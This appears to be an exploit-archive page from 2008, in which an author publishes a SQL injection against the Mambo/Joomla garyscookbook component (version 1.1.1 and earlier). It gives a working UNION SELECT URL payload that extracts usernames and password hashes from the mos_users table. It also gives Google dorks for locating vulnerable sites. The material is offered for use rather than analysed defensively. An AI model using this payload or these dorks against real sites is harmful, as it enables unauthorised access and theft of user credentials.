Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
# Published : 2008-02-23
# Author : S@BUN
# Previous Title : Joomla Component simple shop 2.0 SQL Injection Vulnerability
# Next Title : phpUserBase 1.3b (unverified.inc.php) Local File Inclusion Vulnerability

###############################################################
#
# joomla com_garyscookbook SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MA?°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
#    there are alot site but exploit not working for all ?± found alot
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################################
EXPLOIT :

index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*


################################################################
# S@BUN             i AM NOT HACKER               S@BUN
################################################################

  <name>garyscookbook</name>
  <creationDate>4-9-2005</creationDate>
  <author>Gerald Berger</author>
  <copyright>This component is released under the GNU/GPL License</copyright>
  <authorEmail>gerald@vb-dozent.net</authorEmail>

  <authorUrl>www.vb-dozent.net</authorUrl>
  <version>1.1.1</version>
  <description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>

# www.Syue.com [2008-02-23]